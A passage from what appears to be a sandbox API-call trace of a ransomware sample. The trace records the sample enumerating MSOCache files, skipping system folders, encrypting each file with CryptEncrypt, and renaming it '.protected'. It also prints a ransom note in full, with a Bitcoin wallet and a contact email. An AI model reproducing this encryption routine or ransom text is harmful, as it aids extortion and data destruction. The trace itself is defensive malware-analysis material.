lpString2="Program Files") returned 1 [0057.978] lstrcmpiW (lpString1="VisioMUI.xml", lpString2="Program Files (x86)") returned 1 [0057.978] lstrcmpiW (lpString1="VisioMUI.xml", lpString2="$Recycle.bin") returned 1 [0057.978] lstrcmpiW (lpString1="VisioMUI.xml", lpString2="System Volume Information") returned 1 [0057.978] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 79 [0057.979] StrStrIW (lpFirst="VisioMUI.xml", lpSrch=".protected") returned 0x0 [0057.979] lstrcmpW (lpString1="VisioMUI.xml", lpString2="RESTORE_FILES.txt") returned 1 [0057.979] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0057.979] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, 
pdwDataLen=0x295f154*=0x30) returned 1 [0057.979] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0057.979] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 79 [0057.979] StrStrW (lpFirst="VisioMUI.xml", lpSrch=".txt") returned 0x0 [0057.979] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 79 [0057.979] StrStrW (lpFirst="VisioMUI.xml", lpSrch=".rar") returned 0x0 [0057.979] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 79 [0057.979] StrStrW (lpFirst="VisioMUI.xml", lpSrch=".zip") returned 0x0 [0057.979] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x251f, lpOverlapped=0x0) returned 1 [0057.981] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffdae1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0057.981] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x251f, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x251f, lpOverlapped=0x0) returned 1 [0057.981] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0057.981] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, 
lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0057.981] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0057.981] CloseHandle (hObject=0xb4) returned 1 [0057.981] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.protected") returned 89 [0057.982] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.protected")) returned 1 [0057.982] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0057.982] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0057.982] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0057.982] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0057.985] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0057.985] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0057.985] lstrlenA (lpString="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") returned 684 [0057.985] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0057.986] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0057.986] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0057.986] CloseHandle (hObject=0xa4) returned 1 [0057.986] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0057.986] lstrcmpiW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0057.986] lstrcmpiW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0057.986] lstrcmpiW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0057.986] lstrcmpiW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0057.986] lstrcmpiW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0057.986] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C") returned 66 [0057.986] lstrcmpW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0057.986] lstrcmpW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0057.986] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*") returned 68 [0057.986] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0057.998] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0057.998] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0057.998] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0057.998] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0057.998] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0057.998] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\.") returned 68 [0057.998] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0057.998] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0057.998] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0057.998] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0057.998] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0057.998] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\." 
(normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0057.998] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0057.998] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0057.998] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0057.998] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0057.998] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0057.999] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0057.999] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\..") returned 69 [0057.999] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0057.999] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0057.999] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0057.999] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0057.999] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0057.999] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0057.999] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\.." 
(normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0057.999] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0057.999] lstrcmpiW (lpString1="OneNoteMUI.msi", lpString2="Windows") returned -1 [0057.999] lstrcmpiW (lpString1="OneNoteMUI.msi", lpString2="Program Files") returned -1 [0057.999] lstrcmpiW (lpString1="OneNoteMUI.msi", lpString2="Program Files (x86)") returned -1 [0057.999] lstrcmpiW (lpString1="OneNoteMUI.msi", lpString2="$Recycle.bin") returned 1 [0057.999] lstrcmpiW (lpString1="OneNoteMUI.msi", lpString2="System Volume Information") returned -1 [0057.999] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 81 [0057.999] StrStrIW (lpFirst="OneNoteMUI.msi", lpSrch=".protected") returned 0x0 [0057.999] lstrcmpW (lpString1="OneNoteMUI.msi", lpString2="RESTORE_FILES.txt") returned -1 [0057.999] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0057.999] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0057.999] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.000] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 81 [0058.000] StrStrW 
(lpFirst="OneNoteMUI.msi", lpSrch=".txt") returned 0x0 [0058.000] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 81 [0058.000] StrStrW (lpFirst="OneNoteMUI.msi", lpSrch=".rar") returned 0x0 [0058.000] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 81 [0058.000] StrStrW (lpFirst="OneNoteMUI.msi", lpSrch=".zip") returned 0x0 [0058.000] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.020] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.020] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.020] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.020] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0058.041] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0058.042] CloseHandle (hObject=0xb4) returned 1 [0058.042] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.protected") returned 91 [0058.042] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi.protected")) returned 1 [0058.043] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.043] lstrcmpiW (lpString1="OneNoteMUI.xml", lpString2="Windows") returned -1 [0058.043] lstrcmpiW (lpString1="OneNoteMUI.xml", lpString2="Program Files") returned -1 [0058.043] lstrcmpiW (lpString1="OneNoteMUI.xml", lpString2="Program Files (x86)") returned -1 [0058.043] lstrcmpiW (lpString1="OneNoteMUI.xml", lpString2="$Recycle.bin") returned 1 [0058.043] lstrcmpiW (lpString1="OneNoteMUI.xml", lpString2="System Volume Information") returned -1 [0058.043] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 81 [0058.043] StrStrIW (lpFirst="OneNoteMUI.xml", lpSrch=".protected") returned 0x0 [0058.043] lstrcmpW (lpString1="OneNoteMUI.xml", lpString2="RESTORE_FILES.txt") returned -1 [0058.043] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.043] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.043] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.043] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 81 [0058.043] StrStrW (lpFirst="OneNoteMUI.xml", lpSrch=".txt") returned 0x0 [0058.043] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 81 [0058.043] StrStrW (lpFirst="OneNoteMUI.xml", lpSrch=".rar") returned 0x0 [0058.043] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 81 [0058.043] StrStrW (lpFirst="OneNoteMUI.xml", lpSrch=".zip") returned 0x0 [0058.043] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x646, lpOverlapped=0x0) returned 1 [0058.054] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff9ba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.054] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x646, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x646, lpOverlapped=0x0) returned 1 [0058.054] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.054] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0058.054] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0058.054] CloseHandle (hObject=0xb4) returned 
1 [0058.054] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.protected") returned 91 [0058.054] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.protected")) returned 1 [0058.055] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.055] lstrcmpiW (lpString1="OnoteLR.cab", lpString2="Windows") returned -1 [0058.055] lstrcmpiW (lpString1="OnoteLR.cab", lpString2="Program Files") returned -1 [0058.055] lstrcmpiW (lpString1="OnoteLR.cab", lpString2="Program Files (x86)") returned -1 [0058.055] lstrcmpiW (lpString1="OnoteLR.cab", lpString2="$Recycle.bin") returned 1 [0058.055] lstrcmpiW (lpString1="OnoteLR.cab", lpString2="System Volume Information") returned -1 [0058.055] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 78 [0058.055] StrStrIW (lpFirst="OnoteLR.cab", lpSrch=".protected") returned 0x0 [0058.055] lstrcmpW (lpString1="OnoteLR.cab", lpString2="RESTORE_FILES.txt") returned -1 [0058.055] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.055] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.055] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.056] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 78 [0058.056] StrStrW (lpFirst="OnoteLR.cab", lpSrch=".txt") returned 0x0 [0058.056] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 78 [0058.056] StrStrW (lpFirst="OnoteLR.cab", lpSrch=".rar") returned 0x0 [0058.056] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 78 [0058.056] StrStrW (lpFirst="OnoteLR.cab", lpSrch=".zip") returned 0x0 [0058.056] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.062] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.062] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.062] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.062] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0058.076] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, 
nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0058.076] CloseHandle (hObject=0xb4) returned 1 [0058.076] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.protected") returned 88 [0058.076] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.protected" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab.protected")) returned 1 [0058.077] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.077] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0058.077] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files") returned 1 [0058.077] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0058.077] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0058.077] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0058.077] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0058.077] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0058.077] lstrcmpW (lpString1="Setup.xml", lpString2="RESTORE_FILES.txt") returned 1 [0058.077] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.077] 